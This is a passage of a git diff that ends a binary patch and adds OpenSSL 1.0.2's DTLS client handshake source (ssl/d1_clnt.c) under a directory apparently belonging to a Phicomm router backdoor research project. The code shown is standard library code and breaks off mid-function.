z7H$Zws?$T^RrU321I^)Py)G08Ys=T%+tj=&+|%CO-Pa-CVgu2r7Fe?;+@DN@qXPqd
z16o~6eYi2u7~U|@w=vw&9c}LwVylL;``yzNULI^>xZE#qZiOnu3s|F{zel3+#6aI>
ztsnX)VZ5&1h_<Rf+Pijb$ln#!`YG+eXFw2i^~R$E2`x-k?RYrc(fM$gF1J(D5aI7p
z<RKCf$g0Kq2XJMN34*S8IMLM;9SBD^^>+<`3gZx~M3mRa=mYD!`n0;>s&E`HvF`Q_
zaj9B+Zv^v8{ri#$0a6cJbd1wC(3RLM8rCOcF^nVb-~uE|4TJ}x9eo3luuUN~@9*mu
z+Hw=wPC+6F4&lydI}{R(y1RNGmRSk`iJZlx9vh_|9f^T%j`E7lIMNs12w|s9MNdRd
zOuXx_?G|<7xFu-j1h^g^0_P@Dn<r-&UcWg3H;>1=m(XN(#XI3l9fBfGUf<E#-n$_h
z?&#|8gni=uQQ3N7=0bE+8f=?IBho5yX+G#O(4K&23P0(MZc1S8lL<L{>Ut8U6r}yp
z=)<<aT)y^haxhyZrIUhmbi}96M!Ykbi1cmj6<p+-%|q@O7<3@9KH8qp*61t!;r@6u
ziCM7CWmCozef_q3iovG3NCMhPxC7h!nv4T*{Askc<HsYsTxmD+8;eK5>7GF)pT5q9
zFQAVKJfFV50DVfquR>kQ^Hc#`o{QL)wW}3+H{vNOgkOV?<a51(tMq@X;ENUdA1U~^
z6r6tiL528Vg^%R_^8$F341hxP*Wx4T`*40zp=O#3YNzsY9xmxe6?{JEBz|1M)p?}z
zoC@)!SW41=sL<265-$}3&_mUW&Sxt0sKiIo*D3h76`X!rOojCN8a|Sqe)>y=a8=H*
z!bg?URB$i)NIpMRaQgX~#D6Vt;(vpJpHy&l+;Ih8pwRzW;a{cT#Uf6o<{K5<rQp>H
z?p1J~g8LNwCIuf7ILUvhf<K|)s{DVW@KNn{QlY26oJ#wgQ*a8wBwixo{QP;DD{#_R
z<^T5zuKL3Z3hq_-A5n1CPu^E>bslGl_@BnTP2sap!BzfODELx^{)Y;Fhl2m3g5Rm&
zZ!5S;Kd#^^{WqNGj6!nK-YD(4M8TISc!Pqg{96@V<=?O1Du1H@{v!of`M;##D*w+E
zT;*RP0&Vh#az*|!1y}v>Qh}2lDir!!g`PrkX`hgSt9(`$;ImP|YZX3&3a%@7TEXiS
z{J8@7VFh2V(Em}vReOG};Ho{n;v!3SQ0Z?`aFzZkfs>u-sv+(3cM7iB=UIi1YUk%E
zVTeNG`tgx`4lB4S&#x6+mFKjAtA4wPeu{xYa$b&)<X@rSs+>N7=ljE-6+EEuSuF0e
zM1PBd?^N(>75rI&lRWA^|AK-qQs{rC@TpSp55z^2#>F4PC-n-8%PZlk-TD<=wOdNT
zuT%KEr{F;aA6M`d3O<jFh(hBw;3Mt4NZ|SUUZddOROl-dK6fklEefuVyIR3j`LClO
z1BK*i#7D~0tKjPX{J#|3tI)rs;OhSTmV&QT=<6wHK%sH3#z&6Zrr;q3A6IbIPnOal
zib8xU@tNeK;NMp8Zh@1X)wpGof|IEvpDhX>bv-_-;Hn)C&|!>{uh)kPuG(R~$deGg
zIxmkZxN4t_f~$O<p-mix_^9jdsK}F$zN%jTB5<Pj;3M_@Ou?HKyj0{#h~BT@YZY9L
zCx;chMWO#c3SO<?vuV>oA^xhqUl(}3{8uUT9`up&H!8R)|NRB<eg#+cdO^Y0Df~wi
zT-En*5r|Moeigq%#AAdn!AHt@m15^L3hqIj3h7H9Sz1L!;xCBzt$Dc2zwgS!<=>4y
z%EM*8+au(c{AC{b<~&^HkvsEnnMbC-<x`P-WM25$JY435`H!6ydYKnKmParDUiC#D
zF7v!HPb$ZidDTq>DEwt!^>7|8^Qxcb;W8ged1951{5x4B50`mQ`D;BXkIZ`>%cGZh
z&)?_aGQUZAP<33HuhgpIn|l)N>+wts*w0Q`8;EwdS0yODQ59)Vv};xC<8iHOppRaN
z+*gGZpZ%&;b@cU64pXb@?Mp<f@RN-jc-~CBZ|F@{AwAKLgvVy|A;!^8$~N{yZMpt`
zzdc|;Q!1_rlk93m?G3TsWP_M~`O0GzGEwa$VpopR<qhRUy8NP0SVDb8ILu>S!oMYO
zVSa*mDW%|IhLS)2^`If1|JnXN^d+7*;iDEg{zrKO%2)ZUMJK8Yx1D5hj)Dag5r)_=
z_?G%hfT2SDX)jib^9uWo&Lp+SapiM08f9IjTO#_a7}fJ>+kw&5D_{PlqQ3`iYRQ*>
zGa89!e*ad{pZ-TvE&2TuXq?G^Hc{}0QXv?V|4?Wy`-|gt#<8j2v8(ADeknST8&b|K
mzdv0w@_h%8RwfMpvpo6p?MG+&O#OFJu!~~YkIC=+{{I(ee%oyT

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_clnt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_clnt.c
new file mode 100644
index 0000000..1858263
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_clnt.c
@@ -0,0 +1,846 @@
+/* ssl/d1_clnt.c */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_KRB5
+# include "kssl_lcl.h"
+#endif
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/md5.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+static const SSL_METHOD *dtls1_get_client_method(int ver);
+static int dtls1_get_hello_verify(SSL *s);
+
+static const SSL_METHOD *dtls1_get_client_method(int ver)
+{
+    if (ver == DTLS1_VERSION || ver == DTLS1_BAD_VER)
+        return (DTLSv1_client_method());
+    else if (ver == DTLS1_2_VERSION)
+        return (DTLSv1_2_client_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_dtls1_meth_func(DTLS1_VERSION,
+                          DTLSv1_client_method,
+                          ssl_undefined_function,
+                          dtls1_connect,
+                          dtls1_get_client_method, DTLSv1_enc_data)
+
+    IMPLEMENT_dtls1_meth_func(DTLS1_2_VERSION,
+                          DTLSv1_2_client_method,
+                          ssl_undefined_function,
+                          dtls1_connect,
+                          dtls1_get_client_method, DTLSv1_2_enc_data)
+
+    IMPLEMENT_dtls1_meth_func(DTLS_ANY_VERSION,
+                          DTLS_client_method,
+                          ssl_undefined_function,
+                          dtls1_connect,
+                          dtls1_get_client_method, DTLSv1_2_enc_data)
+
+int dtls1_connect(SSL *s)
+{
+    BUF_MEM *buf = NULL;
+    unsigned long Time = (unsigned long)time(NULL);
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    int ret = -1;
+    int new_state, state, skip = 0;
+#ifndef OPENSSL_NO_SCTP
+    unsigned char sctpauthkey[64];
+    char labelbuffer[sizeof(DTLS1_SCTP_AUTH_LABEL)];
+#endif
+
+    RAND_add(&Time, sizeof(Time), 0);
+    ERR_clear_error();
+    clear_sys_error();
+
+    if (s->info_callback != NULL)
+        cb = s->info_callback;
+    else if (s->ctx->info_callback != NULL)
+        cb = s->ctx->info_callback;
+
+    s->in_handshake++;
+    if (!SSL_in_init(s) || SSL_in_before(s))
+        SSL_clear(s);
+
+#ifndef OPENSSL_NO_SCTP
+    /*
+     * Notify SCTP BIO socket to enter handshake mode and prevent stream
+     * identifier other than 0. Will be ignored if no SCTP is used.
+     */
+    BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_SET_IN_HANDSHAKE,
+             s->in_handshake, NULL);
+#endif
+
+#ifndef OPENSSL_NO_HEARTBEATS
+    /*
+     * If we're awaiting a HeartbeatResponse, pretend we already got and
+     * don't await it anymore, because Heartbeats don't make sense during
+     * handshakes anyway.
+     */
+    if (s->tlsext_hb_pending) {
+        dtls1_stop_timer(s);
+        s->tlsext_hb_pending = 0;
+        s->tlsext_hb_seq++;
+    }
+#endif
+
+    for (;;) {
+        state = s->state;
+
+        switch (s->state) {
+        case SSL_ST_RENEGOTIATE:
+            s->renegotiate = 1;
+            s->state = SSL_ST_CONNECT;
+            s->ctx->stats.sess_connect_renegotiate++;
+            /* break */
+        case SSL_ST_BEFORE:
+        case SSL_ST_CONNECT:
+        case SSL_ST_BEFORE | SSL_ST_CONNECT:
+        case SSL_ST_OK | SSL_ST_CONNECT:
+
+            s->server = 0;
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_START, 1);
+
+            if ((s->version & 0xff00) != (DTLS1_VERSION & 0xff00) &&
+                (s->version & 0xff00) != (DTLS1_BAD_VER & 0xff00)) {
+                SSLerr(SSL_F_DTLS1_CONNECT, ERR_R_INTERNAL_ERROR);
+                ret = -1;
+                goto end;
+            }
+
+            /* s->version=SSL3_VERSION; */
+            s->type = SSL_ST_CONNECT;
+
+            if (s->init_buf == NULL) {
+                if ((buf = BUF_MEM_new()) == NULL) {
+                    ret = -1;
+                    goto end;
+                }
+                if (!BUF_MEM_grow(buf, SSL3_RT_MAX_PLAIN_LENGTH)) {
+                    ret = -1;
+                    goto end;
+                }
+                s->init_buf = buf;
+                buf = NULL;
+            }
+
+            if (!ssl3_setup_buffers(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            /* setup buffing BIO */
+            if (!ssl_init_wbio_buffer(s, 0)) {
+                ret = -1;
+                goto end;
+            }
+
+            /* don't push the buffering BIO quite yet */
+
+            s->state = SSL3_ST_CW_CLNT_HELLO_A;
+            s->ctx->stats.sess_connect++;
+            s->init_num = 0;
+            /* mark client_random uninitialized */
+            memset(s->s3->client_random, 0, sizeof(s->s3->client_random));
+            s->d1->send_cookie = 0;
+            s->hit = 0;
+            s->d1->change_cipher_spec_ok = 0;
+            /*
+             * Should have been reset by ssl3_get_finished, too.
+             */
+            s->s3->change_cipher_spec = 0;
+            break;
+
+#ifndef OPENSSL_NO_SCTP
+        case DTLS1_SCTP_ST_CR_READ_SOCK:
+
+            if (BIO_dgram_sctp_msg_waiting(SSL_get_rbio(s))) {
+                s->s3->in_read_app_data = 2;
+                s->rwstate = SSL_READING;
+                BIO_clear_retry_flags(SSL_get_rbio(s));
+                BIO_set_retry_read(SSL_get_rbio(s));
+                ret = -1;
+                goto end;
+            }
+
+            s->state = s->s3->tmp.next_state;
+            break;
+
+        case DTLS1_SCTP_ST_CW_WRITE_SOCK:
+            /* read app data until dry event */
+
+            ret = BIO_dgram_sctp_wait_for_dry(SSL_get_wbio(s));
+            if (ret < 0)
+                goto end;
+
+            if (ret == 0) {
+                s->s3->in_read_app_data = 2;
+                s->rwstate = SSL_READING;
+                BIO_clear_retry_flags(SSL_get_rbio(s));
+                BIO_set_retry_read(SSL_get_rbio(s));
+                ret = -1;
+                goto end;
+            }
+
+            s->state = s->d1->next_state;
+            break;
+#endif
+
+        case SSL3_ST_CW_CLNT_HELLO_A:
+        case SSL3_ST_CW_CLNT_HELLO_B:
+
+            s->shutdown = 0;
+
+            /* every DTLS ClientHello resets Finished MAC */
+            ssl3_init_finished_mac(s);
+
+            dtls1_start_timer(s);
+            ret = ssl3_client_hello(s);
+            if (ret <= 0)
+                goto end;
+
+            if (s->d1->send_cookie) {
+                s->state = SSL3_ST_CW_FLUSH;
+                s->s3->tmp.next_state = SSL3_ST_CR_SRVR_HELLO_A;
+            } else
+                s->state = SSL3_ST_CR_SRVR_HELLO_A;
+
+            s->init_num = 0;
+
+#ifndef OPENSSL_NO_SCTP
+            /* Disable buffering for SCTP */
+            if (!BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+#endif
+                /*
+                 * turn on buffering for the next lot of output
+                 */
+                if (s->bbio != s->wbio)
+                    s->wbio = BIO_push(s->bbio, s->wbio);
+#ifndef OPENSSL_NO_SCTP
+            }
+#endif
+
+            break;
+
+        case SSL3_ST_CR_SRVR_HELLO_A:
+        case SSL3_ST_CR_SRVR_HELLO_B:
+            ret = ssl3_get_server_hello(s);
+            if (ret <= 0)
+                goto end;
+            else {
+                if (s->hit) {
+#ifndef OPENSSL_NO_SCTP
+                    /*
+                     * Add new shared key for SCTP-Auth, will be ignored if
+                     * no SCTP used.
+                     */
+                    snprintf((char *)labelbuffer,
+                             sizeof(DTLS1_SCTP_AUTH_LABEL),
+                             DTLS1_SCTP_AUTH_LABEL);
+
+                    SSL_export_keying_material(s, sctpauthkey,
+                                               sizeof(sctpauthkey),
+                                               labelbuffer,
+                                               sizeof(labelbuffer), NULL, 0,
+                                               0);
+
+                    BIO_ctrl(SSL_get_wbio(s),
+                             BIO_CTRL_DGRAM_SCTP_ADD_AUTH_KEY,
+                             sizeof(sctpauthkey), sctpauthkey);
+#endif
+
+                    s->state = SSL3_ST_CR_FINISHED_A;
+                } else
+                    s->state = DTLS1_ST_CR_HELLO_VERIFY_REQUEST_A;
+            }
+            s->init_num = 0;
+            break;
+
+        case DTLS1_ST_CR_HELLO_VERIFY_REQUEST_A:
+        case DTLS1_ST_CR_HELLO_VERIFY_REQUEST_B:
+
+            ret = dtls1_get_hello_verify(s);
+            if (ret <= 0)
+                goto end;
+            dtls1_stop_timer(s);
+            if (s->d1->send_cookie) /* start again, with a cookie */
+                s->state = SSL3_ST_CW_CLNT_HELLO_A;
+            else
+                s->state = SSL3_ST_CR_CERT_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CR_CERT_A:
+        case SSL3_ST_CR_CERT_B:
+            /* Check if it is anon DH or PSK */
+            if (!(s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL) &&
+                !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
+                ret = ssl3_get_server_certificate(s);
+                if (ret <= 0)
+                    goto end;
+#ifndef OPENSSL_NO_TLSEXT
+                if (s->tlsext_status_expected)
+                    s->state = SSL3_ST_CR_CERT_STATUS_A;
+                else
+                    s->state = SSL3_ST_CR_KEY_EXCH_A;
+            } else {
+                skip = 1;
+                s->state = SSL3_ST_CR_KEY_EXCH_A;
+            }
+#else
+            } else
+                skip = 1;
+
+            s->state = SSL3_ST_CR_KEY_EXCH_A;
+#endif
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CR_KEY_EXCH_A:
+        case SSL3_ST_CR_KEY_EXCH_B:
+            ret = ssl3_get_key_exchange(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_CERT_REQ_A;
+            s->init_num = 0;
+
+            /*
+             * at this point we check that we have the required stuff from
+             * the server
+             */
+            if (!ssl3_check_cert_and_algorithm(s)) {
+                ret = -1;
+                goto end;
+            }
+            break;
+
+        case SSL3_ST_CR_CERT_REQ_A:
+        case SSL3_ST_CR_CERT_REQ_B:
+            ret = ssl3_get_certificate_request(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_SRVR_DONE_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CR_SRVR_DONE_A:
+        case SSL3_ST_CR_SRVR_DONE_B:
+            ret = ssl3_get_server_done(s);
+            if (ret <= 0)
+                goto end;
+            dtls1_stop_timer(s);
+            if (s->s3->tmp.cert_req)
+                s->s3->tmp.next_state = SSL3_ST_CW_CERT_A;
+            else
+                s->s3->tmp.next_state = SSL3_ST_CW_KEY_EXCH_A;
+            s->init_num = 0;
+
+#ifndef OPENSSL_NO_SCTP
+            if (BIO_dgram_is_sctp(SSL_get_wbio(s)) &&
+                state == SSL_ST_RENEGOTIATE)
+                s->state = DTLS1_SCTP_ST_CR_READ_SOCK;
+            else
+#endif
+                s->state = s->s3->tmp.next_state;
+            break;
+
+        case SSL3_ST_CW_CERT_A:
+        case SSL3_ST_CW_CERT_B:
+        case SSL3_ST_CW_CERT_C:
+        case SSL3_ST_CW_CERT_D:
+            dtls1_start_timer(s);
+            ret = ssl3_send_client_certificate(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CW_KEY_EXCH_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CW_KEY_EXCH_A:
+        case SSL3_ST_CW_KEY_EXCH_B:
+            dtls1_start_timer(s);
+            ret = ssl3_send_client_key_exchange(s);
+            if (ret <= 0)
+                goto end;
+
+#ifndef OPENSSL_NO_SCTP
+            /*
+             * Add new shared key for SCTP-Auth, will be ignored if no SCTP
+             * used.
+             */
+            snprintf((char *)labelbuffer, sizeof(DTLS1_SCTP_AUTH_LABEL),
+                     DTLS1_SCTP_AUTH_LABEL);
+
+            SSL_export_keying_material(s, sctpauthkey,
+                                       sizeof(sctpauthkey), labelbuffer,
+                                       sizeof(labelbuffer), NULL, 0, 0);
+
+            BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_ADD_AUTH_KEY,
+                     sizeof(sctpauthkey), sctpauthkey);
+#endif
+
+            /*
+             * EAY EAY EAY need to check for DH fix cert sent back
+             */
+            /*
+             * For TLS, cert_req is set to 2, so a cert chain of nothing is
+             * sent, but no verify packet is sent
+             */
+            if (s->s3->tmp.cert_req == 1) {
+                s->state = SSL3_ST_CW_CERT_VRFY_A;
+            } else {
+#ifndef OPENSSL_NO_SCTP
+                if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+                    s->d1->next_state = SSL3_ST_CW_CHANGE_A;
+                    s->state = DTLS1_SCTP_ST_CW_WRITE_SOCK;
+                } else
+#endif
+                    s->state = SSL3_ST_CW_CHANGE_A;
+            }
+
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CW_CERT_VRFY_A:
+        case SSL3_ST_CW_CERT_VRFY_B:
+            dtls1_start_timer(s);
+            ret = ssl3_send_client_verify(s);
+            if (ret <= 0)
+                goto end;
+#ifndef OPENSSL_NO_SCTP
+            if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+                s->d1->next_state = SSL3_ST_CW_CHANGE_A;
+                s->state = DTLS1_SCTP_ST_CW_WRITE_SOCK;
+            } else
+#endif
+                s->state = SSL3_ST_CW_CHANGE_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CW_CHANGE_A:
+        case SSL3_ST_CW_CHANGE_B:
+            if (!s->hit)
+                dtls1_start_timer(s);
+            ret = dtls1_send_change_cipher_spec(s,
+                                                SSL3_ST_CW_CHANGE_A,
+                                                SSL3_ST_CW_CHANGE_B);
+            if (ret <= 0)
+                goto end;
+
+            s->state = SSL3_ST_CW_FINISHED_A;
+            s->init_num = 0;
+
+            s->session->cipher = s->s3->tmp.new_cipher;
+#ifdef OPENSSL_NO_COMP
+            s->session->compress_meth = 0;
+#else
+            if (s->s3->tmp.new_compression == NULL)
+                s->session->compress_meth = 0;
+            else
+                s->session->compress_meth = s->s3->tmp.new_compression->id;
+#endif
+            if (!s->method->ssl3_enc->setup_key_block(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            if (!s->method->ssl3_enc->change_cipher_state(s,
+                                                          SSL3_CHANGE_CIPHER_CLIENT_WRITE))
+            {
+                ret = -1;
+                goto end;
+            }
+#ifndef OPENSSL_NO_SCTP
+            if (s->hit) {
+                /*
+                 * Change to new shared key of SCTP-Auth, will be ignored if
+                 * no SCTP used.
+                 */
+                BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_NEXT_AUTH_KEY,
+                         0, NULL);
+            }
+#endif
+
+            dtls1_reset_seq_numbers(s, SSL3_CC_WRITE);
+            break;
+
+        case SSL3_ST_CW_FINISHED_A:
+        case SSL3_ST_CW_FINISHED_B:
+            if (!s->hit)
+                dtls1_start_timer(s);
+            ret = ssl3_send_finished(s,
+                                     SSL3_ST_CW_FINISHED_A,
+                                     SSL3_ST_CW_FINISHED_B,
+                                     s->method->
+                                     ssl3_enc->client_finished_label,
+                                     s->method->
+                                     ssl3_enc->client_finished_label_len);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CW_FLUSH;
+
+            /* clear flags */
+            s->s3->flags &= ~SSL3_FLAGS_POP_BUFFER;
+            if (s->hit) {
+                s->s3->tmp.next_state = SSL_ST_OK;
+#ifndef OPENSSL_NO_SCTP
+                if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+                    s->d1->next_state = s->s3->tmp.next_state;
+                    s->s3->tmp.next_state = DTLS1_SCTP_ST_CW_WRITE_SOCK;
+                }
+#endif
+                if (s->s3->flags & SSL3_FLAGS_DELAY_CLIENT_FINISHED) {
+                    s->state = SSL_ST_OK;
+#ifndef OPENSSL_NO_SCTP
+                    if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+                        s->d1->next_state = SSL_ST_OK;
+                        s->state = DTLS1_SCTP_ST_CW_WRITE_SOCK;
+                    }
+#endif
+                    s->s3->flags |= SSL3_FLAGS_POP_BUFFER;
+                    s->s3->delay_buf_pop_ret = 0;
+                }
+            } else {
+#ifndef OPENSSL_NO_SCTP
+                /*
+                 * Change to new shared key of SCTP-Auth, will be ignored if
+                 * no SCTP used.
+                 */
+                BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_NEXT_AUTH_KEY,
+                         0, NULL);
+#endif
+
+#ifndef OPENSSL_NO_TLSEXT
+                /*
+                 * Allow NewSessionTicket if ticket expected
+                 */
+                if (s->tlsext_ticket_expected)
+                    s->s3->tmp.next_state = SSL3_ST_CR_SESSION_TICKET_A;
+                else
+#endif
+
+                    s->s3->tmp.next_state = SSL3_ST_CR_FINISHED_A;
+            }
+            s->init_num = 0;
+            break;
+
+#ifndef OPENSSL_NO_TLSEXT
+        case SSL3_ST_CR_SESSION_TICKET_A:
+        case SSL3_ST_CR_SESSION_TICKET_B:
+            ret = ssl3_get_new_session_ticket(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_FINISHED_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CR_CERT_STATUS_A:
+        case SSL3_ST_CR_CERT_STATUS_B:
+            ret = ssl3_get_cert_status(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_KEY_EXCH_A;
+            s->init_num = 0;
+            break;
+#endif
+
+        case SSL3_ST_CR_FINISHED_A:
+        case SSL3_ST_CR_FINISHED_B:
+            s->d1->change_cipher_spec_ok = 1;
+            ret = ssl3_get_finished(s, SSL3_ST_CR_FINISHED_A,
+                                    SSL3_ST_CR_FINISHED_B);
+            if (ret <= 0)
+                goto end;
+            dtls1_stop_timer(s);
+
+            if (s->hit)
+                s->state = SSL3_ST_CW_CHANGE_A;
+            else
+                s->state = SSL_ST_OK;
+
+#ifndef OPENSSL_NO_SCTP
+            if (BIO_dgram_is_sctp(SSL_get_wbio(s)) &&
+                state == SSL_ST_RENEGOTIATE) {
+                s->d1->next_state = s->state;
+                s->state = DTLS1_SCTP_ST_CW_WRITE_SOCK;
+            }
+#endif
+
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CW_FLUSH:
+            s->rwstate = SSL_WRITING;
+            if (BIO_flush(s->wbio) <= 0) {
+                /*
+                 * If the write error was fatal, stop trying
+                 */
+                if (!BIO_should_retry(s->wbio)) {
+                    s->rwstate = SSL_NOTHING;
+                    s->state = s->s3->tmp.next_state;
+                }
+
+                ret = -1;
+                goto end;
+            }
+            s->rwstate = SSL_NOTHING;
+            s->state = s->s3->tmp.next_state;
+            break;
+
+        case SSL_ST_OK:
+            /* clean a few things up */
+            ssl3_cleanup_key_block(s);
+
+#if 0
+            if (s->init_buf != NULL) {
+                BUF_MEM_free(s->init_buf);
+                s->init_buf = NULL;
+            }
+#endif
+
+            /*
+             * If we are not 'joining' the last two packets, remove the
+             * buffering now
+             */
+            if (!(s->s3->flags & SSL3_FLAGS_POP_BUFFER))
+                ssl_free_wbio_buffer(s);
+            /* else do it later in ssl3_write */
+
+            s->init_num = 0;
+            s->renegotiate = 0;
+            s->new_session = 0;
+
+            ssl_update_cache(s, SSL_SESS_CACHE_CLIENT);
+            if (s->hit)
+                s->ctx->stats.sess_hit++;
+
+            ret = 1;
+            /* s->server=0; */
+            s->handshake_func = dtls1_connect;
+            s->ctx->stats.sess_connect_good++;
+
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_DONE, 1);
+
+            /* done with handshaking */
+            s->d1->handshake_read_seq = 0;
+            s->d1->next_handshake_write_seq = 0;
+            goto end;
+            /* break; */
+
+        default:
